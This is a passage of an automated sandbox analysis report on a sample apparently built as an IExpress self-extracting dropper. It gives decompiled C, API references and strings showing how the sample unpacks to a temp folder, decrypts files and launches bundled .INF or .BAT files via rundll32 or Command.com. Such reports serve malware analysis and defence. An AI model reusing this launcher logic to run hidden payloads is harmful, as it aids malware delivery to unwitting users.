0x00ce3c56
0x00ce3c60
0x00ce3c65
0x00ce3c77
0x00ce3c78
0x00ce3c7c
0x00ce3c7e
0x00ce3c82
0x00ce3c82
0x00000000
0x00ce3c7c
0x00ce3c67
0x00ce3c69
0x00ce3c6d
0x00000000
0x00ce3c58
0x00ce3c58
0x00ce3c6e
0x00ce3c6e
0x00ce3c87
0x00ce3c89
0x00ce3d4d
0x00ce3d4f
0x00ce3d50
0x00ce3d52
0x00ce3d9e
0x00ce3da8
0x00ce3daf
0x00ce3db4
0x00ce3db6
0x00ce3f4d
0x00ce3f4d
0x00ce3f4f
0x00ce3f56
0x00ce3f57
0x00ce3f58
0x00ce3f63
0x00ce3f63
0x00ce3dbc
0x00ce3dc0
0x00ce3dc2
0x00ce3de6
0x00ce3de6
0x00ce3de8
0x00ce3f0b
0x00ce3f0b
0x00ce3f0f
0x00ce3f13
0x00ce3f15
0x00ce3f1a
0x00ce3f1c
0x00ce3f46
0x00ce3f47
0x00000000
0x00ce3f47
0x00ce3f1e
0x00ce3f1f
0x00ce3f25
0x00ce3f26
0x00ce3f2a
0x00ce3f2d
0x00ce3fd9
0x00ce3fd9
0x00ce3fda
0x00ce3fda
0x00ce3fe1
0x00ce3fe3
0x00ce3fe3
0x00ce3fe8
0x00000000
0x00ce3fe8
0x00ce3f33
0x00ce3f37
0x00000000
0x00ce3f37
0x00ce3dee
0x00ce3dee
0x00ce3df5
0x00ce3fad
0x00ce3fb9
0x00ce3fc2
0x00ce3fc8
0x00000000
0x00ce3fc8
0x00ce3dfb
0x00ce3dfd
0x00000000
0x00000000
0x00ce3e03
0x00ce3e0a
0x00000000
0x00000000
0x00ce3e15
0x00ce3e17
0x00ce3e19
0x00ce3f94
0x00ce3fa4
0x00ce3f7c
0x00ce3f80
0x00ce3f8b
0x00000000
0x00ce3f8b
0x00ce3e2c
0x00ce3e30
0x00ce3e34
0x00ce3e36
0x00ce3f69
0x00ce3f6e
0x00ce3f70
0x00ce3f76
0x00000000
0x00ce3f76
0x00ce3e3c
0x00ce3e43
0x00ce3e47
0x00ce3e52
0x00ce3e56
0x00ce3e5c
0x00ce3e61
0x00ce3e68
0x00ce3e70
0x00ce3e74
0x00ce3e7c
0x00ce3e80
0x00ce3e82
0x00ce3e82
0x00ce3e87
0x00ce3e87
0x00ce3e8b
0x00ce3e91
0x00ce3e94
0x00ce3e96
0x00ce3e96
0x00ce3e9b
0x00ce3e9b
0x00ce3e9f
0x00ce3ea2
0x00ce3ea4
0x00ce3ea4
0x00ce3ea9
0x00ce3ea9
0x00ce3ead
0x00ce3eb3
0x00ce3eb6
0x00ce3eb8
0x00ce3eb8
0x00ce3ebd
0x00ce3ebd
0x00ce3ec1
0x00ce3ec3
0x00ce3ec5
0x00ce3ec5
0x00ce3eca
0x00ce3eca
0x00ce3ece
0x00ce3ed5
0x00ce3ed9
0x00ce3ee0
0x00ce3ee6
0x00ce3eea
0x00ce3eec
0x00ce3eee
0x00ce3ef3
0x00ce3ef3
0x00ce3ef5
0x00ce3efa
0x00ce3efb
0x00ce3efd
0x00ce3f40
0x00000000
0x00ce3eff
0x00ce3eff
0x00ce3f05
0x00000000
0x00ce3f05
0x00ce3efd
0x00ce3dc7
0x00ce3dce
0x00000000
0x00000000
0x00ce3dd0
0x00ce3dd7
0x00000000
0x00000000
0x00ce3dd9
0x00ce3ddb
0x00000000
0x00000000
0x00ce3ddd
0x00ce3de1
0x00000000
0x00ce3de1
0x00ce3d59
0x00ce3d65
0x00ce3d6a
0x00ce3d6c
0x00000000
0x00000000
0x00ce3d6e
0x00ce3d75
0x00000000
0x00000000
0x00ce3d8f
0x00ce3d96
0x00ce3d98
0x00000000
0x00000000
0x00000000
0x00ce3d98
0x00ce3c8f
0x00ce3c98
0x00ce3cf1
0x00ce3cf3
0x00000000
0x00000000
0x00ce3cfe
0x00ce3d11
0x00000000
0x00000000
0x00000000
0x00ce3d11
0x00ce3c9c
0x00ce3ca5
0x00ce3ca7
0x00000000
0x00000000
0x00ce3cad
0x00ce3cb2
0x00ce3cb7
0x00ce3cc5
0x00000000
0x00000000
0x00ce3ce8
0x00ce3cec
0x00ce3ced
0x00ce3ced
0x00000000
0x00ce3ce8
0x00ce3c9e
0x00000000
0x00ce3c9e
0x00ce3c56
0x00ce3d35
0x00ce3d35
0x00ce3d3c
0x00ce3d48
0x00000000
0x00ce3d48
0x00ce3c03
0x00ce3be2
0x00ce3be7
0x00ce3bee
0x00000000
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00CE3C11
CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00CE3CDC

Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46A0
Part of subcall function 00CE468F: SizeofResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46A9
Part of subcall function 00CE468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00CE46C3
Part of subcall function 00CE468F: LoadResource.KERNEL32(00000000,00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46CC
Part of subcall function 00CE468F: LockResource.KERNEL32(00000000,?,00CE2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46D3
Part of subcall function 00CE468F: memcpy_s.MSVCRT ref: 00CE46E5
Part of subcall function 00CE468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00CE46EF

CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00CE8C42), ref: 00CE3D8F
GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00CE3E26
FreeLibrary.KERNEL32(00000000,?,00CE8C42), ref: 00CE3EFF
LocalFree.KERNEL32(?,?,?,?,00CE8C42), ref: 00CE3F1F
FreeLibrary.KERNEL32(00000000,?,00CE8C42), ref: 00CE3F40
LocalFree.KERNEL32(?,?,?,?,00CE8C42), ref: 00CE3F47
FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00CE8C42), ref: 00CE3F76
LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00CE8C42), ref: 00CE3F80
LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00CE8C42), ref: 00CE3FC2

Strings

advpack.dll, xrefs: 00CE3F9D
USRQCMD, xrefs: 00CE3CAD
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE3E74
DoInfInstall, xrefs: 00CE3E1F, 00CE3E24, 00CE3F68
<None>, xrefs: 00CE3CC9, 00CE3D7D
SHOWWINDOW, xrefs: 00CE3C34
foto5566, xrefs: 00CE3E68
REBOOT, xrefs: 00CE3BE2
D, xrefs: 00CE3C19
POSTRUNPROGRAM, xrefs: 00CE3D60
RUNPROGRAM, xrefs: 00CE3D05
ADMQCMD, xrefs: 00CE3C9E

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$foto5566
API String ID: 1032054927-2639181678
Opcode ID: 0830693a08df21596632ee023316f5027ef0e6336844088c525f55442f902b6a
Instruction ID: 89fb142cbc0be9b7bbaaeef1b7f282d84c6ae030e577cf68b6168dcf0a7a344d
Opcode Fuzzy Hash: 0830693a08df21596632ee023316f5027ef0e6336844088c525f55442f902b6a
Instruction Fuzzy Hash: 4DB1E070A043C19FD720DF668C89B6F76E4EB84710F100A29FAA5DB290DB74EA44CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00CE1AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00CE1AE8(long __ecx, CHAR** _a4, int* _a8) {
				signed int _v8;
				char _v268;
				char _v527;
				char _v528;
				char _v1552;
				CHAR* _v1556;
				int* _v1560;
				CHAR** _v1564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t48;
				CHAR* _t53;
				CHAR* _t54;
				char* _t57;
				char* _t58;
				CHAR* _t60;
				void* _t62;
				signed char _t65;
				intOrPtr _t76;
				intOrPtr _t77;
				unsigned int _t85;
				CHAR* _t90;
				CHAR* _t92;
				char _t105;
				char _t106;
				CHAR** _t111;
				CHAR* _t115;
				intOrPtr* _t125;
				void* _t126;
				CHAR* _t132;
				CHAR* _t135;
				void* _t138;
				void* _t139;
				void* _t145;
				intOrPtr* _t146;
				char* _t148;
				CHAR* _t151;
				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xce8004; // 0xd1db73d
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00CE1680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00CE1A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00CE1781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\");
					E00CE658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00CE1680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00CE66C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00CE66C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00CE1680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00CE1781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00CE16B3( &_v1552, 0x400, " ");
										E00CE16B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00CE2AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00CE171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00CE1A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00CE1A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00CE44B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xce9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xce1140, _t156, 8,  &_v268) == 0) {
										 *0xce9a34 =  *0xce9a34 & 0xfffffffb;
										if( *0xce9a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00CE171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xce9a34 =  *0xce9a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00CE1680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00CE1680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00CE6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00ce1af3
0x00ce1afa
0x00ce1b07
0x00ce1b09
0x00ce1b1a
0x00ce1b20
0x00ce1b2c
0x00ce1b3b
0x00ce1b40
0x00ce1b2e
0x00ce1b2e
0x00ce1b33
0x00ce1b33
0x00ce1b46
0x00ce1b4c
0x00ce1b52
0x00ce1b57
0x00ce1b5d
0x00ce1b61
0x00ce1b9f
0x00ce1b9f
0x00ce1bb1
0x00ce1bc2
0x00000000
0x00ce1b63
0x00ce1b63
0x00ce1b65
0x00ce1b68
0x00ce1b68
0x00ce1b6a
0x00ce1b6b
0x00ce1b6f
0x00ce1b74
0x00000000
0x00000000
0x00ce1b76
0x00ce1b7b
0x00ce1b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00ce1b8c
0x00ce1b8c
0x00ce1b98
0x00ce1bc7
0x00ce1bc9
0x00ce1bcc
0x00ce1bd3
0x00ce1d75
0x00ce1d76
0x00ce1d78
0x00ce1d7f
0x00ce1e05
0x00ce1e09
0x00000000
0x00000000
0x00ce1e12
0x00ce1e1b
0x00ce1e73
0x00ce1e21
0x00ce1e21
0x00ce1e28
0x00ce1e37
0x00ce1e3e
0x00ce1e52
0x00ce1e60
0x00ce1e60
0x00ce1e3e
0x00ce1e79
0x00ce1e7b
0x00ce1e84
0x00000000
0x00ce1d9b
0x00ce1d9b
0x00ce1da0
0x00ce1da2
0x00ce1da5
0x00ce1da5
0x00ce1da7
0x00ce1da8
0x00ce1dac
0x00ce1dae
0x00ce1db4
0x00ce1db7
0x00ce1db7
0x00ce1db9
0x00ce1dba
0x00ce1dbe
0x00ce1dc3
0x00ce1dce
0x00ce1dd2
0x00ce1deb
0x00000000
0x00ce1df0
0x00000000
0x00ce1dd2
0x00ce1bf7
0x00ce1bfe
0x00ce1c07
0x00ce1d55
0x00ce1d5a
0x00ce1d5b
0x00ce1d5d
0x00ce1d5e
0x00000000
0x00ce1c1b
0x00ce1c1b
0x00ce1c20
0x00ce1c2c
0x00ce1c33
0x00ce1c38
0x00ce1c3a
0x00ce1c3a
0x00ce1c40
0x00ce1c4b
0x00ce1c4b
0x00ce1c5d
0x00ce1c61
0x00ce1dd4
0x00ce1dd4
0x00ce1dd6
0x00ce1ddb
0x00ce1ddc
0x00ce1dde
0x00ce1d64
0x00ce1d64
0x00ce1d67
0x00ce1d6c
0x00000000
0x00ce1c67
0x00ce1c67
0x00ce1c6d
0x00ce1c72
0x00ce1c74
0x00ce1c74
0x00ce1c8e
0x00ce1c99
0x00ce1cc0
0x00ce1cf8
0x00ce1d07
0x00ce1d23
0x00ce1d09
0x00ce1d14
0x00ce1d1b
0x00ce1d1b
0x00ce1d2b
0x00ce1d2d
0x00ce1d2d
0x00ce1d38
0x00ce1d39
0x00ce1d46
0x00ce1cc2
0x00ce1cc2
0x00ce1ccc
0x00ce1cce
0x00ce1cce
0x00ce1cdb
0x00ce1ce6
0x00ce1cee
0x00ce1cee
0x00ce1e89
0x00ce1e91
0x00ce1e92
0x00ce1e94
0x00ce1e97
0x00ce1ea4
0x00ce1ea4
0x00ce1c61
0x00ce1c07
0x00ce1bd3
0x00ce1b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00CE1BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00CE1BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00CE1C57
GetPrivateProfileIntA.KERNEL32 ref: 00CE1C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00CE1140,00000000,00000008,?), ref: 00CE1CB8
GetShortPathNameA.KERNEL32 ref: 00CE1D1B

Part of subcall function 00CE44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00CE4518
Part of subcall function 00CE44B9: MessageBoxA.USER32(?,?,foto5566,00010010), ref: 00CE4554

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE1BA0
setupapi.dll, xrefs: 00CE1D23, 00CE1D3A
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00CE1D3B
DefaultInstall, xrefs: 00CE1C74, 00CE1C87, 00CE1CCE, 00CE1CD3, 00CE1D2D, 00CE1D39
.BAT, xrefs: 00CE1D83
setupx.dll, xrefs: 00CE1D14
Command.com /c %s, xrefs: 00CE1D9B, 00CE1DE8
.INF, xrefs: 00CE1BDB
Reboot, xrefs: 00CE1C82
", xrefs: 00CE1B25
AdvancedINF, xrefs: 00CE1CAE
Version, xrefs: 00CE1CB3

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-2869639027
Opcode ID: c983f3797dc0543c16446df314d3104acf71a31728b548bb83832d78398c26ec
Instruction ID: 0a879c68b8fc99b69a9c1bed82bfa1fe08b0f57ad63bb2e7e96395839a092274
Opcode Fuzzy Hash: c983f3797dc0543c16446df314d3104acf71a31728b548bb83832d78398c26ec
Instruction Fuzzy Hash: CDA149B0A002D45BEF209B26CC45BEE7769DB51310F1C02A8FD65A72D0DBB49FA5CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00CE2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0xce8004; // 0xd1db73d
				_v8 = _t9 ^ _t46;
				if( *0xce8a38 != 0) {
					L5:
					_t11 = E00CE5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00CE6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E00CE55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E00CE658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0xcea288("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0xce8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP001.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0xce8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0xce8d48 & 0x000000c0;
									if(( *0xce8d48 & 0x000000c0) == 0) {
										_t41 =  *0xce9a40; // 0x3, executed
										_t26 = E00CE256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0xce8a24; // 0x0
									 *0xce9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0xce8a38;
										if( *0xce8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00CE4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0xce9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00CE3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0xce8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00CE3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E00CE44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0xce9124 = E00CE6285();
							goto L16;
						}
						_t59 =  *0xce9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E00CE621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0xce8a24;
				if( *0xce8a24 != 0) {
					L4:
					_t34 = E00CE3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E00CE51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0xce8a38;
				if( *0xce8a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00ce2f1d
0x00ce2f28
0x00ce2f2f
0x00ce2f3d
0x00ce2f6c
0x00ce2f6c
0x00ce2f71
0x00ce2f73
0x00ce3041
0x00ce3041
0x00ce3043
0x00ce3053
0x00ce3053
0x00ce2f79
0x00ce2f80
0x00000000
0x00ce2f86
0x00ce2f86
0x00ce2f93
0x00ce2f9e
0x00ce2fa0
0x00ce2fa6
0x00ce2fb8
0x00ce2fba
0x00ce2fbe
0x00ce2fc6
0x00ce2fcc
0x00ce2fd4
0x00ce2fd6
0x00ce2fd8
0x00ce2fe0
0x00ce2fe6
0x00ce2fee
0x00ce2ff0
0x00ce2ff5
0x00ce2ff5
0x00ce2fee
0x00ce2fd4
0x00ce2ff8
0x00ce2ffe
0x00ce3004
0x00ce3017
0x00ce301c
0x00ce3024
0x00ce3054
0x00ce305a
0x00ce3065
0x00ce3065
0x00ce306c
0x00ce306e
0x00ce3075
0x00ce307a
0x00ce307a
0x00ce307c
0x00ce3081
0x00ce3087
0x00ce3089
0x00ce30a1
0x00ce30a1
0x00ce30a9
0x00ce30ab
0x00ce30ad
0x00ce30af
0x00ce30af
0x00ce30ad
0x00ce30b6
0x00000000
0x00ce308b
0x00ce308b
0x00ce3091
0x00000000
0x00000000
0x00ce3093
0x00ce3098
0x00ce309a
0x00000000
0x00000000
0x00ce309c
0x00000000
0x00ce309c
0x00ce3089
0x00ce305c
0x00ce3061
0x00ce3063
0x00000000
0x00000000
0x00000000
0x00ce3063
0x00ce302b
0x00ce3032
0x00ce303c
0x00000000
0x00ce303c
0x00ce3006
0x00ce300c
0x00000000
0x00000000
0x00ce300e
0x00ce3015
0x00000000
0x00000000
0x00000000
0x00ce3015
0x00ce2f80
0x00ce2f3f
0x00ce2f46
0x00ce2f5f
0x00ce2f5f
0x00ce2f64
0x00ce2f66
0x00000000
0x00000000
0x00000000
0x00ce2f66
0x00ce2f4f
0x00000000
0x00000000
0x00ce2f55
0x00ce2f5d
0x00000000
0x00000000
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 00CE2F93
LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00CE2FB2
GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00CE2FC6
DecryptFileA.ADVAPI32 ref: 00CE2FE6
FreeLibrary.KERNEL32(00000000), ref: 00CE2FF8
SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00CE301C

Part of subcall function 00CE51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00CE2F4D,?,00000002,00000000), ref: 00CE5201

Strings

C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00CE2FDB, 00CE3017
advapi32.dll, xrefs: 00CE2F99
DecryptFileA, xrefs: 00CE2FC0

Memory Dump Source

Source File: 00000006.00000002.480863653.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00CE0000, based on PE: true

Associated: 00000006.00000002.480851845.0000000000CE0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480892339.0000000000CE8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEA000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.480912265.0000000000CEC000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ce0000_x5587928.jbxd

Similarity

API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
API String ID: 2126469477-1274120739
Opcode ID: 1dac9675f922c83701d51609f0095fcc2d5ae3c77233eb4208e9578cb18763ae
Instruction ID: a7a32faa1d22d001314b3d490b1012aab5ce6b8fc86ebf5695ca530dade98586
Opcode Fuzzy Hash: 1dac9675f922c83701d51609f0095fcc2d5ae3c77233eb4208e9578cb18763ae
Instruction Fuzzy Hash: 8241C431A002D59BDB30AB739D8DB6E37A8DB54750F00007AE966C7191EF74EF84EA61

Uniqueness

Uniqueness Score: -1.00%

Function 00CE2390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00CE2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0xce8004; // 0xd1db73d
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E00CE6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E00CE1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
